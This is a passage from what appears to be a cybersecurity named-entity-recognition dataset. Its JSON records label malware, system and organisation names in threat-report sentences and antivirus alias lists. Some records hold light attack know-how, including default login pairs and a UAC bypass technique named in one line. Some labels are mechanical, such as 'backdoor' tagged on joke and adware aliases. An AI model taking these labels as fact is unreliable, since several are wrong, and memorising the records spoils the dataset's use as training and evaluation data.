Trojan.Win32.KeyTrap.cqpstf Trojan.Zbot Trojan-Spy.Win32.KeyTrap.0667 Trojan.Keytrap.A TrojanSpy.KeyTrap!BitwoBsZQO0 Troj.Spy.W32.KeyTrap.0667!c Trojan.Keytrap.A Trojan-Spy.Win32.KeyTrap.0667 Trojan.Keytrap.A Trojan.KeyTrap.667 Trojan.KeyTrap.Win32.3 BehavesLike.Win32.Backdoor.gm W32/Trojan.DWIV-6801 TrojanSpy.KeyTrap.a TR/Spy.Keytrap.0667 W32/KeyTrap.C!tr Trojan[Spy]/Win32.KeyTrap Trojan.Keytrap.A Trojan.Keytrap.A TrojanSpy.KeyTrap Win32.Trojan-spy.Keytrap.Srwt Backdoor.Win32.Exploiter Trojan.Keytrap.A Trojan.Win32.KeyTrap.0667", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000921", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor/W32.PcClient.97040 Backdoor.Win32.PcClient!O Trojandropper.Wkysol BackDoor-FDE.c Backdoor/PcClient.esvo BKDR_SKYIPOT.SM Trojan.ADH BKDR_SKYIPOT.SM Win.Trojan.Sykipot-11 Trojan.Win32.PcClient.sobip Backdoor.Win32.A.PcClient.1718954 Backdoor.W32.PcClient.evyq!c Application.Win32.BlkIC.IMG Trojan.Inject.55763 Backdoor.PcClient.Win32.18292 BackDoor-FDE.c Backdoor/PcClient.qga Trojan:Win32/Wisp.A TR/Drop.Wkysol.A.16 Trojan[Backdoor]/Win32.PcClient Trojan.Buzy.D10B5 TrojanDropper:Win32/Wkysol.A Trojan/Win32.PcClient.R3923 Trojan.DR.Wkysol!Xqkt2PEhr70 Trojan-Dropper.Win32.Wkysol Win32/Backdoor.325", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000923", "source": "cyner2_valid"}} {"text": "By adding the previously calculated offset , it can get the address of the mmap function in the target process memory .", "spans": {}, "info": {"id": "cyner2_valid_000924", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.OnlineGameEPRKY.Trojan Trojan/W32.Antavmu.36864.C Trojan.Win32.Antavmu!O Trojan/Antavmu.hsb Win32.Trojan.WisdomEyes.16070401.9500.9988 W32/Trojan.KUSP-1562 Win32/KillAV.UJ TROJ_ANTIAV.SMIA Trojan.Win32.Antavmu.apjw Trojan.Win32.Antavmu.bgnnf Trojan.Win32.Antavmu.36864 Win32.Trojan.Antavmu.Dyzy TrojWare.Win32.GameThief.Magania.~NWABI 
Trojan.Antavmu.Win32.2547 TROJ_ANTIAV.SMIA Trojan.Win32.Antavmu W32/Trojan2.MYQF Trojan.Antavmu.bdj Trojan:Win32/Ghopog.A TR/Ghopog.A Trojan/Win32.Antavmu Trojan.Win32.Antavmu.apjw Trojan:Win32/Ghopog.A Trojan/Win32.Antavmu.R4765 Win32/Ghopog.AA Trojan.Antavmu!Ef7gP/QKiws W32/Antavmu.HSB!tr Trojan.Antavmu Win32/Trojan.2ff", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000925", "source": "cyner2_valid"}} {"text": "For this first test, I selected 5 sets of passwords; admin/admin, guest/guest, ubnt/ubnt, cisco/cisco and ADMIN/ADMIN the last for picking up folks scanning for Supermicro IPMI devices.", "spans": {"System: Supermicro IPMI devices.": [[161, 185]]}, "info": {"id": "cyner2_valid_000926", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.AutorunHA.Trojan Win32.Worm.Fujacks.CX Win32.Worm.Fujacks.CX Trojan.MalPack.NSPack W32/Fujack.cv Win32.Worm.Fujacks.CX W32.Fujacks.E Win32/Emerleox.GT PE_FUJACKS.J Worm.Win32.Fujack.cv Win32.Worm.Fujacks.CX Trojan.Win32.HLLP.ikfyi W32.W.Fujack.lmEa Win32.Worm.Fujacks.CX Win32.Worm.Fujacks.CX Win32.HLLP.Whboy.98 PE_FUJACKS.J BehavesLike.Win32.Downloader.ch Win32.Vking.lx.5756 Virus:Win32/Viking.JB Win32.WhBoy.AZ Worm.Win32.Fujack.cv Win32.Worm.Fujacks.CX Win32/Dellboy.BA W32/Fujacks.au Virus.Win32.Fujack Win32.Fujacks Virus.Win32.Viking.a Trojan.Crypt W32/Fujacks.AU W32/P2PWorm.O Virus.Win32.Viking.AS", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000928", "source": "cyner2_valid"}} {"text": "Indexed directories on C2 infrastructure While exfiltrated content is encrypted , information used to generate the password is plainly visible in the top level directories for each device .", "spans": {}, "info": {"id": "cyner2_valid_000929", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanPWS.Sacanph.OL8 TSPY_SACANPH.SMA Win.Trojan.Delf-21318 Trojan.Win32.Delf.bcbvuf TrojWare.Win32.Delf.BCSA Trojan.Click2.62954 Dropper.Dapato.Win32.18956 
TSPY_SACANPH.SMA BehavesLike.Win32.Dropper.bc Trojan/Delf.umm Trojan[Dropper]/Win32.Dapato PWS:Win32/Sacanph.A Trojan.Heur.E90F0E Dropper/Win32.Dapato.R49251 TScope.Trojan.Delf Virus.Win32.Delf.DTW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000930", "source": "cyner2_valid"}} {"text": "The concept of file-less malware is not a new one.", "spans": {}, "info": {"id": "cyner2_valid_000931", "source": "cyner2_valid"}} {"text": "Technical analysis Most of this new attack ’ s routines are similar to those of the previous XLoader versions .", "spans": {"Malware: XLoader": [[93, 100]]}, "info": {"id": "cyner2_valid_000932", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Dalatar.FC.1351 Win32.Trojan.WisdomEyes.16070401.9500.9997 Backdoor:MSIL/Dalatar.A Trojan.Zusy.D1E964 Trojan.MSIL.Tixiker", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000933", "source": "cyner2_valid"}} {"text": "We will discuss the peer-to-peer part in a future blog post.", "spans": {}, "info": {"id": "cyner2_valid_000934", "source": "cyner2_valid"}} {"text": "Additionally, we uncovered ties between the C2 infrastructure and individuals in China active in online hacking forums that claim to work in Trojan development.", "spans": {"System: C2 infrastructure": [[44, 61]], "Organization: individuals": [[66, 77]], "Malware: Trojan development.": [[141, 160]]}, "info": {"id": "cyner2_valid_000937", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9910 Backdoor.Korplug BKDR_KORPLUG.AQU Backdoor.Win32.Gulpix.yu Backdoor.Gulpix.Win32.115 BKDR_KORPLUG.AQU Trojan/Korplug.a TR/Korplug.CX Trojan/Win32.Korplug Trojan.Graftor.D27053 Backdoor.Win32.Gulpix.yu Backdoor:Win32/Korplug.A!dha Backdoor/Win32.Korplug.R132401 Trojan.Injector Trj/CI.A Win32.Backdoor.Xplug.Auto Trojan.Korplug!cJRvYGQKvZc Trojan.Win32.Korplug W32/Korplug.AP!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_valid_000938", "source": "cyner2_valid"}} {"text": "This instance of Kronos was configured to target US, Canadian, and Australian financial sites.", "spans": {"Malware: Kronos": [[17, 23]], "Organization: financial sites.": [[78, 94]]}, "info": {"id": "cyner2_valid_000939", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB.Win32.22737 W32/VBTrojan.17E!Maximus Trojan.Win32.VB.tik Trojan.Win32.VB.qrzev Troj.W32.VB.tik!c BehavesLike.Win32.Autorun.qt W32/VBTrojan.17E!Maximus Trojan.VB.iaf Trojan/Win32.VB Trojan.Heur.EFD38D Trojan.Win32.VB.tik Trj/CI.A Win32.Trojan.Vb.Wstt Trojan.VB!GS478WYbRuw W32/VB.F", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000940", "source": "cyner2_valid"}} {"text": "A backdoor also known as: BrowserModifier.Diplugem.A5 Trojan/ExtenBro.cb Trojan.Adware.Midie.D14BF Win32.Trojan.ExtenBro.a Trojan.Win32.BPlug.ehtqrq Trojan.BPlug.1099 Trojan.ExtenBro W32.Trojan.Extenbro TR/ExtenBro.jrruf GrayWare[AdWare]/Win32.ExtBro Trojan:Win32/ExtenBro.D.bit! 
Trj/GdSda.A Win32/Trojan.b1c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000941", "source": "cyner2_valid"}} {"text": "A company representative declined to comment for this post .", "spans": {}, "info": {"id": "cyner2_valid_000942", "source": "cyner2_valid"}} {"text": "In those slides CSE assess with moderate certainty that this group is a French intelligence agency.", "spans": {"Organization: CSE": [[16, 19]]}, "info": {"id": "cyner2_valid_000943", "source": "cyner2_valid"}} {"text": "XcodeGhost is the first compiler malware in OS X.", "spans": {"Malware: XcodeGhost": [[0, 10]], "Malware: compiler malware": [[24, 40]], "System: OS X.": [[44, 49]]}, "info": {"id": "cyner2_valid_000944", "source": "cyner2_valid"}} {"text": "The addition of mobile threat defense into these capabilities means that Microsoft Defender for Endpoint ( previously Microsoft Defender Advanced Threat Protection ) now delivers protection on all major platforms .", "spans": {"System: Microsoft Defender": [[73, 91]], "System: Microsoft Defender Advanced Threat Protection": [[118, 163]]}, "info": {"id": "cyner2_valid_000945", "source": "cyner2_valid"}} {"text": "FinFisher loader calling native Windows API to perform anti-debugging tricks At this point , the fun in analysis is not over .", "spans": {"Malware: FinFisher": [[0, 9]], "System: Windows": [[32, 39]]}, "info": {"id": "cyner2_valid_000946", "source": "cyner2_valid"}} {"text": "Trend Micro offers security for Android mobile devices through Mobile Security for Android™ to protect against these types of attacks .", "spans": {"Organization: Trend Micro": [[0, 11]], "System: Android": [[32, 39]], "System: Mobile Security for Android™": [[63, 91]]}, "info": {"id": "cyner2_valid_000947", "source": "cyner2_valid"}} {"text": "Victims ’ first encounter with the malware reportedly comes via an unsolicited text message that their Android smartphone receives .", "spans": {"System: Android smartphone": [[103, 121]]}, 
"info": {"id": "cyner2_valid_000948", "source": "cyner2_valid"}} {"text": "The TTPs used in this attack also match those detailed in the paper.", "spans": {}, "info": {"id": "cyner2_valid_000949", "source": "cyner2_valid"}} {"text": "RuMMS samples and C2 servers Figure 8 shows how these samples , C2 servers and hosting websites are related to each other , including when they were compiled or observed .", "spans": {"Malware: RuMMS": [[0, 5]]}, "info": {"id": "cyner2_valid_000950", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Reconyc.1463296 Trojan.Reconyc Trojan.Win32.Reconyc.ikny Trojan.Win64.Reconyc.euumvq Trojan.Win32.Z.Reconyc.1463296 Troj.W32.Reconyc!c TR/Reconyc.jhmvt Trojan/Win32.Reconyc Trojan.Win32.Reconyc.ikny Trojan/Win32.Reconyc.C1837813 Trojan.Reconyc Trj/CI.A Win32.Trojan.Reconyc.Akpg Trojan.Win32.Reconyc W32/Reconyc.HXLM!tr Win32/Trojan.d73", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000951", "source": "cyner2_valid"}} {"text": "For example DMA Locker 3.0, Cerber, or some newer editions of Locky.", "spans": {"Malware: DMA Locker 3.0, Cerber,": [[12, 35]], "Malware: newer editions of Locky.": [[44, 68]]}, "info": {"id": "cyner2_valid_000953", "source": "cyner2_valid"}} {"text": "Whereas botnets previously had to run on systems that attackers owned or had compromised, now bots can run on Skype and other cloud-based chat programs, providing an even lower-cost alternative for attackers.", "spans": {"Malware: botnets": [[8, 15]], "System: systems": [[41, 48]], "Vulnerability: compromised,": [[77, 89]], "System: Skype": [[110, 115]], "System: cloud-based chat programs,": [[126, 152]]}, "info": {"id": "cyner2_valid_000954", "source": "cyner2_valid"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 HEUR_VBA.E Trojan.SBVF-4 VB:Trojan.Valyria.D4BC virus.office.qexvmc.1065", 
"spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000955", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Mikey.DDE47 W32/Trojan2.PBBS W32/Trojan.ZGWN-4268 TR/Disclipboard.pjtux Win32/Delf.TMP Trj/CI.A Win32/Trojan.2a9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000956", "source": "cyner2_valid"}} {"text": "The malware evoulve since its previous variant and now arrives with new capabilities.", "spans": {}, "info": {"id": "cyner2_valid_000957", "source": "cyner2_valid"}} {"text": "We also observed automatically generated files on the C2 , indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office documents .", "spans": {}, "info": {"id": "cyner2_valid_000958", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Explaol.78718 Win32.Trojan.WisdomEyes.16070401.9500.9993 AOL.Trojan Win.Trojan.Explaol-1 Trojan.Win32.Explaol.gljz Troj.IM.W32.Explaol!c TrojWare.Win32.AOL.Explaol.A Trojan.Expla Trojan.Explaol.Win32.1 APStrojan.tn W32/Trojan.DRFT-5550 Trojan/AOL.Explaol Trojan[IM]/Win32.Explaol Trojan.Razy.D1D187 Trojan/Win32.LdPinch.C26165 APS.tn TrojanIM.Explaol Win32/AOL.Explaol.A Trojan.AOL.Explaol!Hfs0yqLP9Gg Trojan.Win32.AOL W32/Explaol.A!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000959", "source": "cyner2_valid"}} {"text": "But they already have a lot of infected users on whom to test their methods .", "spans": {}, "info": {"id": "cyner2_valid_000960", "source": "cyner2_valid"}} {"text": "Our analysis suggests that the four short numbers are associated with Russian financial institutions , presumably where a victim would be likely to have accounts .", "spans": {}, "info": {"id": "cyner2_valid_000961", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.BitwanX.Trojan Trojan-Ransom.Win32.Fullscreen!O Ransom.Weenloc.A8 Trojan.Winlock Trojan-Ransom.Win32.Blocker.jzec 
Trojan/LockScreen.agu Ransom_WINLOCK.SM Win32.Trojan.LockScreen.b W32/Trojan2.OAEZ Trojan.Ransomlock Win32/Ransom.PC Ransom_WINLOCK.SM Win.Trojan.Fullscreen-41 Trojan-Ransom.Win32.Blocker.jzec Trojan.Win32.Fullscreen.crnep Trojan.Win32.A.ChameleonUnlicence.383298 Trojan.Winlock.3333 Trojan.Fullscreen.Win32.35 Trojan-Ransom.Win32.Fullscreen W32/Trojan.GDVD-7096 Trojan/Fullscreen.ak Trojan[Ransom]/Win32.PornoAsset.cioy Ransom:Win32/Weenloc.A Trojan-Ransom.Win32.Blocker.jzec Trojan/Win32.Atraps.R214152 Hoax.PornoAsset Trojan.Fullscreen Win32/LockScreen.AGU", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000962", "source": "cyner2_valid"}} {"text": "MacOSX Malware OSX/Pirrit", "spans": {"System: MacOSX": [[0, 6]], "Malware: Malware": [[7, 14]]}, "info": {"id": "cyner2_valid_000963", "source": "cyner2_valid"}} {"text": "Most of the affected devices were located in the Middle East , and many of the stolen data we saw is military-related ( e.g. , images , documents ) .", "spans": {}, "info": {"id": "cyner2_valid_000964", "source": "cyner2_valid"}} {"text": "DualToy is still active and we have detected over 8,000 unique samples belonging to this Trojan family to date.", "spans": {"Malware: DualToy": [[0, 7]], "Malware: Trojan family": [[89, 102]]}, "info": {"id": "cyner2_valid_000965", "source": "cyner2_valid"}} {"text": "Over the past two years, this group's activity has increased significantly, with numerous attacks against government departments and embassies all over the world.", "spans": {"Organization: government departments": [[106, 128]], "Organization: embassies": [[133, 142]]}, "info": {"id": "cyner2_valid_000966", "source": "cyner2_valid"}} {"text": "A remarkable fact is that all the targeted apps relate to Spanish banks , including targets never seen before in any other Android banking Trojan .", "spans": {"System: Android": [[123, 130]]}, "info": {"id": "cyner2_valid_000967", "source": "cyner2_valid"}} {"text": "A backdoor also known 
as: Trojan.Gofot Trojan.Heur.RX.E0D4E8 Spyware.Keylogger Trojan.Win32.Gofot.ige Trojan.Win32.Gofot.ewpvcy Win32.Trojan.Gofot.Akos WIN.MACRO.Virus BehavesLike.Win32.Trojan.cm Trojan/Win32.Gofot Trojan.Win32.Gofot.ige Trojan/Win32.FakeMS.R38399 Trojan.FKM!lm2VdjZ5xTI Trojan.Win32.Danglo", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000968", "source": "cyner2_valid"}} {"text": "In doing so, the attacker can remain out of view from antivirus technologies, and even next-generation' technologies that only focus on file-based threat vectors.", "spans": {"Organization: antivirus technologies,": [[54, 77]], "Vulnerability: file-based threat vectors.": [[136, 162]]}, "info": {"id": "cyner2_valid_000969", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Inject.r4 Spyware.Zbot.ED Trojan.Sharik.Win32.637 Win32.Trojan.WisdomEyes.151026.9950.9994 W32/Trojan.YLTQ-8086 Trojan.Zbot TROJ_SPNR.11F514 Trojan.Win32.Zbot.cxjaze Trojan.Win32.Z.Zbot.315392.DQ[h] TrojWare.Win32.Injector.OWLP Trojan.PWS.Stealer.1932 TROJ_SPNR.11F514 BehavesLike.Win32.Downloader.fc TR/Spy.ZBot.rzoqov Trojan/Win32.Inject Trojan.Zboter.5 Backdoor.W32.Simda.lXOM Trojan:Win32/Chebri.B Trojan/Win32.Fareit.N1169001314 Trojan.Inject Win32.Trojan.Spy.Pjdn Trojan.Inject!Wt2mU/5sSds Trojan-PWS.Win32.Zbot W32/Kryptik.WIF!tr SHeur4.BURV", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000970", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.ChePro Trojan.Banker Win32.Trojan.WisdomEyes.16070401.9500.9834 Infostealer.Bancos Trojan-Banker.Win32.ChePro.ink Trojan.Win32.ChePro.dmluub Troj.Banker.W32.Chepro!c Trojan/Banker.ChePro.adp TR/Crypt.Xpack.100961 Trojan[Banker]/Win32.ChePro Trojan.Symmi.DA527 Trojan-Banker.Win32.ChePro.ink TrojanDownloader:Win32/Reboon.F Trojan/Win32.Banload.C643313 Win32.Trojan-banker.Chepro.Pefs Trojan-Downloader.Win32.Banload W32/Banload.URD!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_valid_000971", "source": "cyner2_valid"}} {"text": "In the newly discovered attack campaign, Unit 42 identified attacks targeting organizations within the telecommunications, high tech, education, manufacturing, and legal services industries.", "spans": {"Organization: Unit 42": [[41, 48]], "Organization: organizations": [[78, 91]], "Organization: telecommunications, high tech, education, manufacturing,": [[103, 159]], "Organization: legal services industries.": [[164, 190]]}, "info": {"id": "cyner2_valid_000972", "source": "cyner2_valid"}} {"text": "This leads us to believe that Zen is just part of a larger infection chain .", "spans": {"Malware: Zen": [[30, 33]]}, "info": {"id": "cyner2_valid_000973", "source": "cyner2_valid"}} {"text": "This report describes an espionage operation using government-exclusive spyware to target a Mexican government food scientists and two public health advocates.", "spans": {"Malware: government-exclusive spyware": [[51, 79]], "Organization: Mexican government food scientists": [[92, 126]], "Organization: public health advocates.": [[135, 159]]}, "info": {"id": "cyner2_valid_000974", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Karba.228120.B TrojanAPT.Garveep.B4 Trojan.Jatif.43 Trojan.ADH.2 Win32/Tnega.eSIVZX TROJ_GARVEEP.SM Html.Trojan.DarkhotelKarba-1 Trojan.Win32.Karba.b Trojan.Win32.Karba.cweynb Troj.W32.Karba.b!c TrojWare.Win32.Dialer.AFXP Trojan.DarkHtl.1 Trojan.Karba.Win32.5 TROJ_GARVEEP.SM W32/Trojan.IWOC-1805 Trojan.Karba.b Worm/Win32.Luder Trojan:Win32/Nemain.A Trojan.Win32.Karba.b Worm/Win32.Luder.R95856 Worm.Luder Win32/Nemim.B Win32.Virus.Nemim.Gls Trojan.Karba! 
Virus.Win32.Nemim W32/Luder.BSMU!worm Win32/Trojan.3ef", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000975", "source": "cyner2_valid"}} {"text": "In the case of 32-bit systems , the malware may attempt a known UAC bypass by launching printui.exe system process and using token manipulation with NtFilterToken as described in this blog post .", "spans": {}, "info": {"id": "cyner2_valid_000977", "source": "cyner2_valid"}} {"text": "If it does , it will commence with the billing process .", "spans": {}, "info": {"id": "cyner2_valid_000978", "source": "cyner2_valid"}} {"text": "This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices .", "spans": {"Malware: XLoader": [[9, 16]], "System: Android": [[53, 60]], "System: iOS": [[92, 95]], "System: iPhone": [[114, 120]], "System: iPad": [[125, 129]]}, "info": {"id": "cyner2_valid_000979", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Delf.iic Win32/Delf.IIC Trojan.Delf-11296 Trojan-Downloader.Win32.DlfBfkg.ln BehavesLike.Win32.Ramnit.fz Trojan/Delf.fsx W32/Delf.IIC!tr Trojan.Heur.E739EC HEUR/Fakon.mwf Worm:Win32/Scrolo.A Worm.Win32.Scrolo Luhe.Fiha.E.dropper", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000980", "source": "cyner2_valid"}} {"text": "At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites in the U.S. Two major banks in the U.K. 
are also on the target list the malware fetches.", "spans": {"Malware: malware": [[18, 25]], "Organization: banks, payment card providers, mobile services providers, payroll, webmail": [[34, 108]], "Organization: e-commerce sites": [[113, 129]], "Organization: major banks": [[146, 157]], "Malware: the malware": [[198, 209]]}, "info": {"id": "cyner2_valid_000981", "source": "cyner2_valid"}} {"text": "Similar to HummingBad , the malware also fakes device identification information , such as IMEI and IMSI , to download an app twice while seeming like the installation is happening on a different device , thereby doubling the potential revenue .", "spans": {"Malware: HummingBad": [[11, 21]]}, "info": {"id": "cyner2_valid_000982", "source": "cyner2_valid"}} {"text": "In recent months, our team has been tracking a keylogger malware family named KeyBase that has been in the wild since February 2015.", "spans": {"Organization: team": [[22, 26]], "Malware: keylogger malware": [[47, 64]], "Malware: KeyBase": [[78, 85]]}, "info": {"id": "cyner2_valid_000983", "source": "cyner2_valid"}} {"text": "Also, ITG08's DNS tunneling uses the layer 4 protocol, User Datagram Protocol UDP.", "spans": {"System: DNS tunneling": [[14, 27]], "System: User Datagram Protocol UDP.": [[55, 82]]}, "info": {"id": "cyner2_valid_000985", "source": "cyner2_valid"}} {"text": "Curiously , several of these have included the world \" Fateh '' in their package name , which may be referring to the Fatah political party .", "spans": {"Organization: Fatah": [[118, 123]]}, "info": {"id": "cyner2_valid_000986", "source": "cyner2_valid"}} {"text": "The malware was spread using spear-phishing emails and the level of sophistication is low.", "spans": {"Malware: malware": [[4, 11]]}, "info": {"id": "cyner2_valid_000987", "source": "cyner2_valid"}} {"text": "To do this , open the displayed link on your mobile phone by typing in the URL field of your browser or scan the displayed QR code .", "spans": {}, "info": 
{"id": "cyner2_valid_000989", "source": "cyner2_valid"}} {"text": "Nabucur encrypts files across a machine, and is also a polymorphic virus that infects files.", "spans": {"Malware: Nabucur": [[0, 7]], "System: machine,": [[32, 40]], "Malware: a polymorphic": [[53, 66]]}, "info": {"id": "cyner2_valid_000991", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Downloader/W32.Kuluoz.241664 TrojanDownloader.Kuluoz Win32.Trojan.WisdomEyes.16070401.9500.9996 Backdoor.IRC.Bot Trojan-Downloader.Win32.Kuluoz.wob Trojan.Win32.Kuluoz.exdcku Troj.Downloader.W32.Kuluoz!c BehavesLike.Win32.Ransomware.dt TrojanDownloader.Kuluoz.abm TR/Crypt.Xpack.yedzb Trojan[Downloader]/Win32.Kuluoz Trojan-Downloader.Win32.Kuluoz.wob Backdoor:Win32/Unskal.D Trj/GdSda.A Trojan.Win32.Crypt W32/Kryptik.EYUI!tr Win32/Trojan.Downloader.b18", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000992", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.FlyStudio.1143740 Trojan-Dropper.Win32.Flystud!O Trojan.FlyStudio.Win32.10928 Win32/SillyAutorun.ALB TSPY_FLYSTUDIO_BL130294.TOMC Trojan.Win32.FlyStudio.abg Trojan.Win32.FlyStudio.dwzdm Troj.W32.FlyStudio.lKXj TSPY_FLYSTUDIO_BL130294.TOMC BehavesLike.Win32.Autorun.tc Trojan.Win32.FlyStudio Trojan/FlyStudio.eef Trojan/Win32.FlyStudio.abg Trojan:Win32/Floyadi.A!bit Trojan.Heur.GC.ED2BD4 Trojan.Win32.FlyStudio.abg Win32.Trojan.FlyStudio.A Trojan.FlyStudio Trojan.FlyStudio", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000993", "source": "cyner2_valid"}} {"text": "With this post, we hope to add a little more color and supplement what you already know about this prolific malware distributor.", "spans": {}, "info": {"id": "cyner2_valid_000994", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Joke.Stupid.A Joke.Stupid.A Hoax.W16.BadJoke.Stupid.a!c Joke.Stupid.A Joke.Idiot Win.Joke.WinStupid-1 Hoax.Win16.BadJoke.Stupid.a Joke.Stupid.A 
Riskware.Win16.Stupid.bvpxe Win16.Trojan-psw.Badjoke.Apwo Joke.Stupid.A ApplicUnsaf.Win16.Hoax.BadJoke.Stupid.a Joke.Stupid.A Trojan.Stupid Tool.Stupid.Win16.1 Joke-SmallP.a not-virus:Joke.Win16.Stupid.a Joke.Stupid.A Joke-SmallP.a not-a-virus:BadJoke.Win16.Stupid.a Riskware/Win.STUPID", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000995", "source": "cyner2_valid"}} {"text": "The main driver behind this traffic is the Necurs botnet.", "spans": {"Malware: the Necurs botnet.": [[39, 57]]}, "info": {"id": "cyner2_valid_000996", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Android.Trojan.SLocker.ALV Trojan:Lockdroid.E Android.Trojan.SLocker.ALV HEUR:Trojan-Ransom.AndroidOS.Svpeng.ad A.H.Rog.LgqLOC Troj.Ransom.Androidos!c Android.Malware.Trojan Android.Locker.471.origin Trojan[Ransom]/Android.Svpeng Android.Trojan.SLocker.ALV Android-Trojan/Koler.6c8c0 HEUR:Trojan-Ransom.AndroidOS.Svpeng.ad a.rogue.simplocker.e Trojan-Ransom.AndroidOS.PornoLocker", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000997", "source": "cyner2_valid"}} {"text": "Such an action can be performed at any moment , regardless of the current application or user location in that application .", "spans": {}, "info": {"id": "cyner2_valid_000998", "source": "cyner2_valid"}} {"text": "The opcode instructions generated by this custom VM are divided into different categories : Logical opcodes , which implement bit-logic operators ( OR , AND , NOT , XOR ) and mathematical operators Conditional branching opcodes , which implement a code branch based on conditions ( equals to JC , JE , JZ , other similar branching opcodes ) Load/Store opcodes , which write to or read from particular addresses of the virtual address space of the process Specialized opcodes for various purposes , like execute specialized machine instruction that are not virtualized We are publishing below the ( hopefully ) complete list of opcodes used by FinFisher VM that 
we found during our analysis and integrated into our de-virtualization script : INDEX MNEMONIC DESCRIPTION 0x0 EXEC Execute machine code 0x1 JG Jump if greater/Jump if not less or equal 0x2 WRITE Write a value into the dereferenced internal VM value ( treated as a pointer ) 0x3 JNO Jump if not overflow 0x4 JLE Jump if less or equal ( signed ) 0x5 MOV Move the value of a register into the VM descriptor ( same as opcode 0x1F ) 0x6 JO Jump if overflow 0x7 PUSH Push the internal VM value to the stack 0x8 ZERO Reset the internal VM value to 0 ( zero ) 0x9 JP Jump if parity even 0xA WRITE Write into an address 0xB ADD Add the value of a register to the internal VM value 0xC JNS Jump if not signed 0xD JL Jump if less ( signed ) 0xE EXEC Execute machine code and branch 0xF JBE Jump if below or equal or Jump if not above 0x10 SHL Shift left the internal value the number of times specified into the opcodes 0x11 JA Jump if above/Jump if not below or equal 0x12 MOV Move the internal VM value into a register 0x13 JZ JMP if zero 0x14 ADD Add an immediate value to the internal Vm descriptor 0x15 JB Jump if below ( unsigned ) 0x16 JS Jump if signed 0x17 EXEC Execute machine code ( same as opcode 0x0 ) 0x18 JGE Jump if greater or equal/Jump if not less 0x19 DEREF Write a register value into a dereferenced pointer 0x1A JMP Special obfuscated “ Jump if below ” opcode 0x1B * Resolve a pointer 0x1C LOAD Load a value into the internal VM descriptor 0x1D JNE Jump if not equal/Jump if not zero 0x1E CALL Call an external function or a function located in the dropper 0x1F MOV Move the value of a register into the VM descriptor 0x20 JNB Jump if not below/Jump if above or equal/Jump if not carry 0x21 JNP Jump if not parity/Jump if parity odd Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM .", "spans": {"Malware: FinFisher": [[643, 652]]}, "info": {"id": "cyner2_valid_000999", "source": 
